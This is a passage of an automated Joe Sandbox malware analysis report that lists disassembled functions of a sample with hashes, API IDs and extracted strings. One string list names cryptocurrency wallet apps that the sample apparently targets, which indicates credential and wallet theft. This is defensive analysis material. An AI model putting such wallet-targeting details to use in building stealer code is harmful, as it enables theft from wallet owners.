                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                                  • String ID: *L\(&.$utf8
                                                                                                                                                                  • API String ID: 3069159798-2230407081
                                                                                                                                                                  • Opcode ID: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                  • Instruction ID: f24309308b317f3b8da1c2b099580e6a1993ace5914f1b0e24e961f03477b035
                                                                                                                                                                  • Opcode Fuzzy Hash: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                  • Instruction Fuzzy Hash: AD91A432A0974285EB24BF21E801AB9A3B4EF64BA0F845131DE5C4B785DFBCE551CB60
                                                                                                                                                                  Function 00007FF72C9FCA44 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1239891234-578493202
                                                                                                                                                                  • Opcode ID: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                  • Instruction ID: 5065749e18068b0fb77195cb43080aeb3e85ff67334eec665853237ec92f2301
                                                                                                                                                                  • Opcode Fuzzy Hash: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D317C36608F8186DB60DB25EC406AEB7B4FB98764F904136EA9D53BA8DF3CD145CB10
                                                                                                                                                                  Function 00007FF72C9E0190 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 282COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: ' is not a number.$*L\(&.
                                                                                                                                                                  • API String ID: 3668304517-2927676846
                                                                                                                                                                  • Opcode ID: 45bcc056e11c8b050fce0dff7f9fb24e3d14619776c4fe604155b1fe59233918
                                                                                                                                                                  • Instruction ID: 74a2c0bff8e30920b97d9b5558ce8332e9291d0a6eecfbc5c5e63bc7f336427b
                                                                                                                                                                  • Opcode Fuzzy Hash: 45bcc056e11c8b050fce0dff7f9fb24e3d14619776c4fe604155b1fe59233918
                                                                                                                                                                  • Instruction Fuzzy Hash: A2D1E622E18BC185E710DB74D8407ADB771FBA57A8F905236EE9C17A99DF38E180CB50
                                                                                                                                                                  Function 00007FF72C9F36EC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                  • Opcode ID: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                  • Instruction ID: 9f05511ecaa649cbb2f4445c4ff43ec3e1beb844dd0acb5133eb09b4f2c77056
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                  • Instruction Fuzzy Hash: AE313D72609B8186EB609F60E8807EDA374FB94754F84403ADB8E57B98DF7CD548CB20
                                                                                                                                                                  Function 00007FF72C9E5720 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1640COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                  • String ID: *L\(&.$0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                  • API String ID: 593203224-2147910804
                                                                                                                                                                  • Opcode ID: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
                                                                                                                                                                  • Instruction ID: 54aac84efac3cdab5051bf05061ebcb8e7b73105204416231943096d236821df
                                                                                                                                                                  • Opcode Fuzzy Hash: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
                                                                                                                                                                  • Instruction Fuzzy Hash: ABE2B662A0C6C589EB51AF29C85037CB7A1EB71FA8F948132DACD47396CE3DD845C720
                                                                                                                                                                  Function 00007FF72C9E4D10 Relevance: 7.8, APIs: 2, Strings: 2, Instructions: 814COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6B9B
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6BC0
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6BEA
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6C7B
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E5712
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E5718
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                  • API String ID: 4156930308-767241296
                                                                                                                                                                  • Opcode ID: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
                                                                                                                                                                  • Instruction ID: d79d6f836758a73e827b189e198bf481798d7cce014e561b79408b1f3b920dbf
                                                                                                                                                                  • Opcode Fuzzy Hash: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4672B222A0C6C189EB51AE69C85037CB7A1EB31FA8F948132DA9D4B395DF3DD855C720
                                                                                                                                                                  Function 00007FF72C9B9830 Relevance: 7.7, Strings: 6, Instructions: 184COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Atomic$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                  • API String ID: 73155330-3631139435
                                                                                                                                                                  • Opcode ID: 2ee202328b28e1bb6b42e951aba61e2543bfbd89fe68a6802938e53a50f09bcd
                                                                                                                                                                  • Instruction ID: 0acb44dcc35704c86da2f36cce6ae002ade8ad8ae4cc0d4db7f7535f04b2d1af
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ee202328b28e1bb6b42e951aba61e2543bfbd89fe68a6802938e53a50f09bcd
                                                                                                                                                                  • Instruction Fuzzy Hash: D371D522F24B9595E700EB71EC402BDA371FBA9794F955232EE8C23A85DF78E580C750
                                                                                                                                                                  Function 00007FF72C9DF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9F2A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72C9F2A68
                                                                                                                                                                    • Part of subcall function 00007FF72C9F2A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72C9F2A6E
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9DFD57
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Missing ',' or ']' in array declaration$in Json::Value::operator[](int index): index cannot be negative
                                                                                                                                                                  • API String ID: 4131450254-3699005852
                                                                                                                                                                  • Opcode ID: 0b546105d5c83c6727593434cef8828a98e34086d396aed44443c3a47580aaec
                                                                                                                                                                  • Instruction ID: 8c0ac3d234c819f9a489d9bb4150543a5a538ee75e2d729f65cf8c36cef418c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b546105d5c83c6727593434cef8828a98e34086d396aed44443c3a47580aaec
                                                                                                                                                                  • Instruction Fuzzy Hash: 38D1A672A08B4142EA24FB15E85537EE3A1FBA5B94F804132DACE57B99DF3DE441CB10
                                                                                                                                                                  Function 00007FF72CA141C8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1791019856-578493202
                                                                                                                                                                  • Opcode ID: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                  • Instruction ID: fe9273e178843d10daaf1028c6a72310e1e1783bf9ea016d5a09e36497d43f9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 63619032A0858286EB34AF19F840B7DA3B1FB64765F845135CB9E93694DFBCE4518B20
                                                                                                                                                                  Function 00007FF72C9F2348 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF72C9F23CB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                  • API String ID: 389471666-631824599
                                                                                                                                                                  • Opcode ID: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                  • Instruction ID: 10c6188e4aedf64f247b4e0e3272f7fb4bf4c94c352af47c959befc0802e2b8b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                  • Instruction Fuzzy Hash: B7118F32608B52A7E744AB22ED51779B2B4FF64760F804135C74D42A54EFBCE4B4CB60
                                                                                                                                                                  Function 00007FF72C9EDF9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                  • Opcode ID: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                  • Instruction ID: 6ba8e198d1e501bdddfc6f81f90c3d73b34af796d4ffc76733d14d3ee637effe
                                                                                                                                                                  • Opcode Fuzzy Hash: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                  • Instruction Fuzzy Hash: 7801C472B0C7C182E7519B11B840B7AB7A1F7A87A5F848036DA8906A98CF3CD501CF51
                                                                                                                                                                  Function 00007FF72CA00F30 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                  • Opcode ID: 3a169fb333f111df0ae1304fb82a5a5346c1f6606d896419b7e9c4814cfa7d1e
                                                                                                                                                                  • Instruction ID: c4c70551d3ef30a84ec3fc1f03e48a2d17710ba6ee08a4b2c8acf332e2e4b988
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a169fb333f111df0ae1304fb82a5a5346c1f6606d896419b7e9c4814cfa7d1e
                                                                                                                                                                  • Instruction Fuzzy Hash: 36C1D772B1868587E724DF25B884BAAF7A1F7947D4F848139DB4A43B44DB3DE801CB40
                                                                                                                                                                  Function 00007FF72C9E86C0 Relevance: 4.0, Strings: 3, Instructions: 251COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.$assert json failed$in Json::Value::operator[](ArrayIndex): requires arrayValue
                                                                                                                                                                  • API String ID: 0-448520649
                                                                                                                                                                  • Opcode ID: b1092fca6618656bcf32c1be29cac426390bc7c097e950715f58b52a4cb4d893
                                                                                                                                                                  • Instruction ID: 7646cc83c3f051b311ee52f391f5809b95870fc4977b3dd78f62652903a45d92
                                                                                                                                                                  • Opcode Fuzzy Hash: b1092fca6618656bcf32c1be29cac426390bc7c097e950715f58b52a4cb4d893
                                                                                                                                                                  • Instruction Fuzzy Hash: 27B1F522A1CA8182EB20EB65DC502BDA3A1FFB4BA4F944136DACD43B95DF3CD541CB10
                                                                                                                                                                  Function 00007FF72CA018B8 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Info
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 1807457897-578493202
                                                                                                                                                                  • Opcode ID: 458247d6631dbea57c75107cdf57c182cc8b229084268f52f2efba03bd95656d
                                                                                                                                                                  • Instruction ID: edb9340cb5289a5258ad466d7a07b7027095b849b29cef6e5369582ad69104c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 458247d6631dbea57c75107cdf57c182cc8b229084268f52f2efba03bd95656d
                                                                                                                                                                  • Instruction Fuzzy Hash: 97129F22A08BC186E751DF38A8557FDB3B4FB69798F859235EB9C42652DF38E180C710
                                                                                                                                                                  Function 00007FF72C9E6CB0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  • Opcode ID: 96ecc0f72a9928f91bfa26dde02c3edad72c9396e32cc41e060eeef61ca00714
                                                                                                                                                                  • Instruction ID: cfda90675565155239848e0bedae53ba4ed0bb65dc3a897a12fd2e74f9b502c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 96ecc0f72a9928f91bfa26dde02c3edad72c9396e32cc41e060eeef61ca00714
                                                                                                                                                                  • Instruction Fuzzy Hash: 67A1122260C6C586EB20AF15E85037DBBA0EB65BA4F944136DADD077C6CF3DE4A0CB10
                                                                                                                                                                  Function 00007FF72CA1070C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 0-578493202
                                                                                                                                                                  • Opcode ID: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
                                                                                                                                                                  • Instruction ID: 55b6a12c11ccc9f330d7f7be1eff677038efcdc822e8526cbf948fd759b4b5ea
